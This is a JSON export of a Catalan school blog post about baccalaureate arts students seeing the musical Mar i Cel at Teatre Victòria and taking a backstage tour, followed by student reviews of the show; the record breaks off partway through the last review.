{"id":308,"date":"2015-11-05T14:30:33","date_gmt":"2015-11-05T13:30:33","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=308"},"modified":"2018-05-06T07:19:43","modified_gmt":"2018-05-06T05:19:43","slug":"mar-i-cel","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/","title":{"rendered":"Mar i Cel al teatre Vict\u00f2ria"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>L&#8217;alumnat de batxillerat art\u00edstic, va poder veure el Musical Mar i Cel, des de la 1a fila de platea com si fos <strong>el mar<\/strong>, i des de l&#8217;escenari com si fos <strong>el cel<\/strong>.\u00a0Tota una brillant obra, culminada amb una visita guiada plena de trucs i curiositats.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-8\/\" rel=\"attachment wp-att-366\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-366 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-8-300x200.jpg\" alt=\"Mar i Cel (8)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-8-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-8.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-9\/\" rel=\"attachment wp-att-367\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-367 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-9-300x200.jpg\" alt=\"Mar i Cel (9)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-9-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-9.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-11\/\" rel=\"attachment wp-att-369\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-369 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-11-300x200.jpg\" alt=\"Mar i Cel (11)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-11-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-11.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>El guia de la visita va explicar la hist\u00f2ria del teatre dins el paral\u00b7lel, per acabar descobrint tots aquells secrets de sota i sobre l&#8217;escenari.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-12\/\" rel=\"attachment wp-att-370\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-370 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-12-300x200.jpg\" alt=\"Mar i Cel (12)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-12-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-12.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-13\/\" rel=\"attachment wp-att-371\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-371 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-13-300x200.jpg\" alt=\"Mar i Cel (13)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-13-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-13.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-1\/\" rel=\"attachment wp-att-359\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-359 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-1-300x200.jpg\" alt=\"Mar i Cel (1)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-1.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-2\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-360 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-2-300x200.jpg\" alt=\"Mar i Cel (2)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-2-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-2.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-5\/\" rel=\"attachment wp-att-363\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-363 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-5-300x200.jpg\" alt=\"Mar i Cel (5)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-5-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-5.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-6\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-364 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-6-300x200.jpg\" alt=\"Mar i Cel (6)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-6-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-6.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-7\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-365 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-7-200x300.jpg\" alt=\"Mar i Cel (7)\" width=\"200\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-7-200x300.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-7.jpg 667w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/mar-i-cel-14\/\" rel=\"attachment wp-att-372\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-372 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-14-200x300.jpg\" alt=\"Mar i Cel (14)\" width=\"200\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-14-200x300.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Mar-i-Cel-14.jpg 333w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/><\/a><\/p>\n<p>L&#8217;activitat inclosa\u00a0dins les mat\u00e8ries de Catal\u00e0 i Dibuix Art\u00edstic, es va treballar pr\u00e8viament a l&#8217;aula tot reben refer\u00e8ncies d&#8217;\u00c0ngel Guimer\u00e0 i coneixent detalls de\u00a0la producci\u00f3 feta per Dagoll Dagom. Els dies previs, l&#8217;alumnat, dividit en grups, va rebre l&#8217;enc\u00e0rrec de posar imatges a la lletra d&#8217;una can\u00e7\u00f3 que ells havien escollit -cal tenir en compte que pr\u00e8viament no havien vist cap escena de l&#8217;obra. El resultat que es buscava -a part de reflexionar i analitzar la lletra- era deixar fluir la imaginaci\u00f3 a partir de les seves can\u00e7ons.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/dsc02067\/\" rel=\"attachment wp-att-686\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-686\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02067-300x200.jpg\" alt=\"DSC02067\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02067-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02067.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-685\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02066-300x200.jpg\" alt=\"DSC02066\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02066-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02066.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-687\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02073-300x200.jpg\" alt=\"DSC02073\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02073-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02073.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/dsc02077\/\" rel=\"attachment wp-att-688\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-688\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02077-300x200.jpg\" alt=\"DSC02077\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02077-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02077.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/dsc02083\/\" rel=\"attachment wp-att-690\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-690\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02083-300x200.jpg\" alt=\"DSC02083\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02083-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02083.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/mar-i-cel\/attachment\/dsc02088\/\" rel=\"attachment wp-att-691\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-691\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02088-300x200.jpg\" alt=\"DSC02088\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02088-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02088.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Les lletres que es van treballar van ser: <a href=\"http:\/\/www.viasona.cat\/grup\/dagoll-dagom\/mar-i-cel\/himne-dels-pirates\" target=\"_blank\">Himne dels pirates<\/a>\u00a0\/\u00a0<a href=\"http:\/\/www.viasona.cat\/grup\/dagoll-dagom\/mar-i-cel\/perque-he-plorat\" target=\"_blank\">Perqu\u00e8 he plorat?<\/a>\u00a0\/\u00a0<a href=\"http:\/\/www.viasona.cat\/grup\/dagoll-dagom\/mar-i-cel\/canco-dosman\" target=\"_blank\">Can\u00e7\u00f3 d&#8217;Osman<\/a>. Despr\u00e9s d&#8217;haver assistir a la representaci\u00f3 teatral es va anar a dibuixar una galera aut\u00e8ntica al Museu Mar\u00edtim, d&#8217;on segurament es devien ambientar a l&#8217;hora de crear l&#8217;escenografia respectiva.<\/p>\n<p>L&#8217;obra estar\u00e0 al teatre Vict\u00f2ria fins el gener del 2016, <a href=\"http:\/\/www.teatrevictoria.com\/\" target=\"_blank\">aqu\u00ed trobarem m\u00e9s informaci\u00f3<\/a>. Fragment <a href=\"https:\/\/www.youtube.com\/watch?v=6SfnAlAZa0o\" target=\"_blank\">musical especial<\/a>, en motiu de 1.111 representacions. Si teniu un pressupost ajustat podeu mirar\u00a0<a href=\"http:\/\/lastminute.barcelonacultura.bcn.cat\/\" target=\"_blank\">last minute les Rambles<\/a>.<\/p>\n<p>A continuaci\u00f3 teniu les cr\u00edtiques que l&#8217;alumnat ha fet de l&#8217;obra:<\/p>\n<p><strong>Lydia Le\u00f3n\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>Mai abans m&#8217;havia interessat tant tot all\u00f2 que es pot amagar darrere d&#8217;una obra de teatre, suposo que perqu\u00e8 mai abans havia assistit a un muntatge tant espectacular com Mar i Cel, aquesta obra escrita per \u00c0ngel Guimer\u00e0 el 1888 que, a trav\u00e9s de les enginyoses mans de la companyia Dagoll Dagom, i sota el sostre del prestigi\u00f3s Teatre Vict\u00f2ria del paral\u00b7lel, s&#8217;ha convertit en un dels espectacles m\u00e9s famosos i aplaudits de Barcelona.<\/p>\n<p>L&#8217;obra narra en alta mar, l&#8217;amor prohibit entre Sa\u00efd, un jove pirata musulm\u00e0, i Blanca, una noia cristiana.<\/p>\n<p>La hist\u00f2ria s\u2019inicia amb el pacte de l&#8217;expulsi\u00f3 dels moriscos. Llavors jo vaig pensar &#8220;Si que s&#8217;han currat els vestits, no?&#8221;, ignorant del que vindria a continuaci\u00f3\u2026 un imponent vaixell apareix per la banda dreta. Una passada de vaixell que es mou sobre l&#8217;escenari! I la resta de l&#8217;obra me la vaig passar amb la boca entre oberta, preguntant-me quina classe d&#8217;obres teatrals de pacotilla m&#8217;havien obligat a empassar-me tots aquests anys.<\/p>\n<p>Em fascinava una escena rere l&#8217;altra, la manera en qu\u00e8 es juga amb els espais de l&#8217;escenari, els moviments del vaixell, els focus&#8230; Les can\u00e7ons s\u00f3n m\u00e0giques. Quan van cantar per segona vegada l\u2019Himne dels Pirates jo tamb\u00e9 volia estar al capdamunt d&#8217;aquell vaixell. \u00c9s m\u00e9s, el saber que est\u00e0s escoltant instruments i veu en directe li d\u00f3na m\u00e9s valor encara, a tot plegat.<\/p>\n<p>Quan surts al carrer, i la llum del sol et d\u00f3na cops de puny a la cara \u00e9s com que no t&#8217;importa, et dius a tu mateix, que ha valgut la pena estar ficat all\u00e0 durant tanta estona. Els decorats, la m\u00fasica, el vaixell i la magn\u00edfica interpretaci\u00f3 dels actors, sumen un musical que ha superat les meves expectatives amb la millor nota.<\/p><\/blockquote>\n<p><strong>Viky Tortato\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>English:<\/p>\n<p>It is a gem of the catalan literature.<br \/>\nThe actors were brillinat and actually trasmitted something. You could actually &#8216;feel&#8217; the love and hate and the grudges between two diffrents thoughts and belifes that can be also related to whats is happening now all aruond the war, which are the cause of the past wars and terrorist attacks.<br \/>\nAlso it as to be said that all the work that is behind is terrific and awsome. Everithing has to be completely shyncronized or it won&#8217;t work, and the way it works gives you the emotions you feel.<br \/>\nA negative thing was that the effects in the actuall scene didn&#8217;t exist. The musicla would have seemed more real if when they killed someone there was some blood, but at the end it was good even without this amazing element that makes evrything more drammatical and precious.<\/p>\n<p>Catal\u00e0:<\/p>\n<p>Mar i Cel \u00e9s una joia de la literatura catalana.\u00a0Els actors son brillants, transmeten molta energia. L\u2019espectador pot \u201csentir&#8221; tant l&#8217;amor com l&#8217;odi, les ranc\u00fanies i les creences dels diferents actors, amb uns pensaments que avui trobem relacionats en m\u00faltiples guerres i atacs terroristes. Aix\u00ed que aquella obra d\u2019\u00c0ngel Guimer\u00e0, escrita el 1888, avui segueix versemblantment vigent.<\/p>\n<p>Tamb\u00e9 cal destacar la fant\u00e0stica feina que hi ha al darrere, \u00e9s impressionant la gran sincronitzaci\u00f3 de tots els elements que conformen l\u2019obra i transmeten emocions a l\u2019espectador.\u00a0Una cosa negativa \u00e9s la manca d\u2019algun efecte com sang a l\u2019escenari, que hagu\u00e9s donat m\u00e9s realisme al musical, per\u00f2 el final, \u00e9s sorprenentment bo sense aquest element i l\u2019obra aconsegueix un final dram\u00e0tic i brillant.<\/p><\/blockquote>\n<p><strong>Neus \u00c1lvarez\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>L\u2019obra de teatre Mar i Cel, \u00e9s el musical m\u00e9s ben rebut a Catalunya, per tercera vegada ha tornat a l\u2019escenari del teatre Vict\u00f2ria gr\u00e0cies a la companyia Dagoll Dagom. L&#8217;obra\u00a0aconsegueix absorbir l\u2019atenci\u00f3 del p\u00fablic des del primer moment, gr\u00e0cies als decorats, els efectes especials i, la suplantaci\u00f3 de les veus i la m\u00fasica en directe fan que sigui una obra molt complexa i atractiva, provocant a l\u2019espectador que li tingui molta estima.<\/p>\n<p>L&#8217;espectacle est\u00e0 ambientat al segle XVII quan els cristians van expulsar a els moriscos d\u2019Espanya. L\u2019obra tracta els temes de la intoler\u00e0ncia entre orient i occident i, per tant, entre les dues religions -la isl\u00e0mica i la cristiana- que es trobaven en el mateix territori. La hist\u00f2ria es desenvolupa a partir de la vida d\u2019uns pirates moriscos que porten a uns cristians presoners. Les difer\u00e8ncies socials, religioses i culturals uneixen m\u00e9s que separen, per Sa\u00efd i Blanca que s\u2019enamoren.<\/p>\n<p>Des del meu punt de vista, al ser el segon cop que veig l\u2019obra he pogut veure molts detalls que no em vaig fixar la primera vegada. Realment penso que \u00e9s una obra molt completa i dif\u00edcil de portar a terme, ja que els actors s\u00b4han de complementar amb els m\u00fasics i \u00e9s una feina amb moltes dificultats. La hist\u00f2ria em va captivar des del primer moment i els actors eren realment brillants.\u00a0Potser quelcom que vaig trobar a faltar va ser la falta de realisme en algunes escenes com la manca de sang per\u00f2, tot i aix\u00ed, \u00e9s un espectacle fant\u00e0stic, recomano que tothom el vegi.<\/p><\/blockquote>\n<p><strong>Roger Adrover\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>Mar i Cel, el musical de m\u00e9s renom a Catalunya, portat a l\u2019escenari del teatre Vict\u00f2ria per la companyia Dagoll Dagom, \u00e9s una hist\u00f2ria que tracta sobre la vida d&#8217;uns pirates moriscos que han segrestat a uns cristians de classe alta. La hist\u00f2ria est\u00e0 molt ben desenvolupada i implementada en un musical. Possiblement, la variant del teatre, el teatre musical, no \u00e9s molt ben rebuda per tots els p\u00fablics. Tot i aix\u00ed, Mar i Cel aconsegueix enganxar a l\u2019espectador a la hist\u00f2ria i, qu\u00e8 vulgui seguir gaudint de la m\u00e0gia que els actors aconsegueixen crear l\u2019escenari, amb les seves veus i actuacions.<br \/>\nPersonalment, he canviat la meva opini\u00f3 de l&#8217;obra radicalment despr\u00e9s d\u2019haver-la vist aquesta vegada. Quan era petit no vaig aconseguir seguir el fil de la hist\u00f2ria i no vaig trobar-li atractiu al musical. Per\u00f2, un cop l&#8217;he vist per segon cop, la hist\u00f2ria m&#8217;ha atrapat i m&#8217;ha fet gaudir d&#8217;un espectacle majestu\u00f3s.<br \/>\nPer altre banda, cal afegir que la m\u00fasica i la veu dels actors en directe, sumen un punt de dificultat a l\u2019obra, tot resultant -si \u00e9s possible- una representaci\u00f3 encara m\u00e9s atractiva.<\/p><\/blockquote>\n<p><strong>Joana Delm\u00e0s\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>L\u2019obra, em va deixar totalment embadalida. Cada moviment, cada expressi\u00f3, les seves veus, la<br \/>\ncoordinaci\u00f3, l\u2019actuaci\u00f3, els moviments del vaixell, les can\u00e7ons&#8230; Em va agradar<br \/>\nabsolutament tot.<\/p>\n<p>La veritat es que no se gaire b\u00e9 qu\u00e8 dir, perqu\u00e8 com que, des del meu punt de vista, va ser una representaci\u00f3 perfecta (potser des del punt de vista professional no ho \u00e9s tant).<\/p>\n<p>Em va semblar molt entretinguda i captivadora, \u00e9s a dir, que \u00e8s impossible apartar la vista<br \/>\nde l\u2019obra. Tamb\u00e9 em va fascinar les ganes que li posaven al fer aquesta obra, i em vaig<br \/>\ndonar compte de que realment els hi agradava el seu treball, tot i que signifiqui un esfor\u00e7<br \/>\nmental i f\u00edsic bestial.<\/p><\/blockquote>\n<p><strong>Kimberly Romero\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>El passat dimecres, l\u2019alumnat de primer de batxillerat Art\u00edstic i dos alumnes m\u00e9s de quart d\u2019ESO vam tenir el privilegi d\u2019anar al teatre Vict\u00f2ria per poder gaudir de l\u2019obra Mar i Cel.\u00a0Va ser una obra molt interessant i maca. Tenia els seus moments de diversi\u00f3, tristesa i motivaci\u00f3. En s\u00ed la historia \u00e9s molt interessant i un cop comen\u00e7a no pots deixar de veure-la.\u00a0Els actors ho van fer genial, es van posar a la pell dels personatges, les veus eren espectaculars i la orquestra magn\u00edfica. Tothom va fer un gran treball.<\/p>\n<p>Una de les coses que m\u00e9s em va impressionar va ser els moviments del vaixell, que pesa 6 tones. I l&#8217;altre, els efectes de fons, la llum, els decorats, la m\u00fasica&#8230; tot plegat em va fer sentir que formava part de l\u2019obra, i aix\u00f2 em va agradar.\u00a0Resumint, \u00e9s una obra que recomano veure-la algun dia a la teva vida, val la pena pagar per obres aix\u00ed.<\/p><\/blockquote>\n<p><strong>Almendra Carrasco\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>Al teatre Vict\u00f2ria la companya teatral, especialitzada en musicals Dagoll Dagom ens va oferir l&#8217;oportunitat d&#8217;assistir a veure l&#8217;obra teatral Mar i cel.\u00a0Personalment a mi no m&#8217;agraden els musicals, per\u00f2 trobo que aquesta obra ha aconseguit interessar-me fins al punt d&#8217;agradar-me. Els actors van captar la meva atenci\u00f3 per les seves grans veus. L&#8217;escenari, per ser de petites dimensions, l&#8217;obra s&#8217;ha adaptat bastant a l&#8217;espai.\u00a0Pel que fa, els efectes de v\u00eddeo, jo no els vaig gaudir gaire b\u00e8 ja que estava a primera fila i no podia veure&#8217;ls completament, per\u00f2 pel que vaig apreciar estaven ben fets, igual que els de so.<\/p>\n<p>El que em va semblar impactant va ser la gran preparaci\u00f3 no nom\u00e9s dels actors si no de la gent que hi ha darrere, com les ajudes per si falla alguna cosa en el moment de l&#8217;obra.<br \/>\nUna de les coses que hi trobo que faltaven van ser els efectes especials com la sang, per\u00f2 tot i aix\u00ed l&#8217;actuaci\u00f3 est\u00e0 molt guanyada.<br \/>\nEn general l&#8217;obra m&#8217;ha semblat interessant i molt ben feta.<\/p><\/blockquote>\n<p><strong>Hug Salvat Cuevas\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>Aquesta obra d\u2019\u00c0ngel Guimer\u00e0, ha sigut transformada en un musical excel\u00b7lent.<br \/>\nLa majoria de l\u2019obra es desenvolupa en un vaixell de fusta de grans dimensions que pot fer diferents moviments, tots ells ajuden a que l\u2019obra es vegi m\u00e9s ambientada en alta mar, juntament amb les projeccions que es veien en diferents al\u00e7ades i donaven una sensaci\u00f3 de 3D.<br \/>\nLa hist\u00f2ria \u00e9s entretinguda i t\u2019enganxa ja que tota l\u2019estona hi ha acci\u00f3.<\/p>\n<p>Per acabar, trobo que el fet de poder veure una obra de teatre amb les veus i la banda sonora en directe, \u00e9s incre\u00efble. Recomano a tothom que vagi a veure el musical, ja que est\u00e0 molt b\u00e9 i \u00e9s per tots els p\u00fablics.<\/p><\/blockquote>\n<p><strong>Noelia Soler\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>Aquest musical fet al teatre Vict\u00f2ria per la companyia Dagoll Dagom, s\u2019ha representat m\u00e9s de tres llargues temporades i amb la participaci\u00f3 repetida d\u2019alguns actors.<br \/>\n\u00c9s un espectacle molt labori\u00f3s amb molt de treball i que gr\u00e0cies a totes les persones darrere dels actes s\u2019ha fet possible aquesta gran actuaci\u00f3.<\/p>\n<p>L\u2019escenari \u00e9s realment poc espai\u00f3s amb el vaixell en mig, de manera que, els personatges de Mar i Cel tenien algunes complicacions per sortir d\u2019escena en cada acte, per\u00f2 durant tota la funci\u00f3 s\u2019ho han preparat tant b\u00e9 i ho han fet amb tanta discreci\u00f3 que en cap moment s\u2019ha notat la sortida de cap d\u2019ells.<br \/>\nEl musical en s\u00ed \u00e9s tota una meravella, encara que fixant-se b\u00e9, en el moment de les acrob\u00e0cies pel vaixell uns dels actors semblava no estar segur del que havia de fer en aquell moment i en d\u2019altres, notant moments d\u2019inseguretat per part dels acr\u00f2bates. Aix\u00f2 no es pot veure en plena acci\u00f3 ja que es dona una mala impressi\u00f3 sobre el teu paper en la funci\u00f3.<\/p>\n<p>Tamb\u00e9 per part de l\u2019orquestra en un dels \u00faltims actes de l\u2019obra ha estat descordinada amb el sup\u00f2sit cop del fuet contra l\u2019esquena d\u2019en Sa\u00efd, essent una equivocaci\u00f3 provocada potser per una falta de concentraci\u00f3.<br \/>\nPer \u00faltim ,els efectes que li han donat a l\u2019obra, han estat en tot moment impecables, de manera que no hi ha hagut cap error. Fent aix\u00ed, que les persones del p\u00fablic ens sent\u00edssim com un personatge m\u00e9s del musical.<\/p><\/blockquote>\n<p><strong>Diana del Rio\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>Mar i Cel \u00e9s una obra de teatre musical escrita per \u00c0ngel Guimer\u00e0 l\u2019any 1888. Tota una trag\u00e8dia 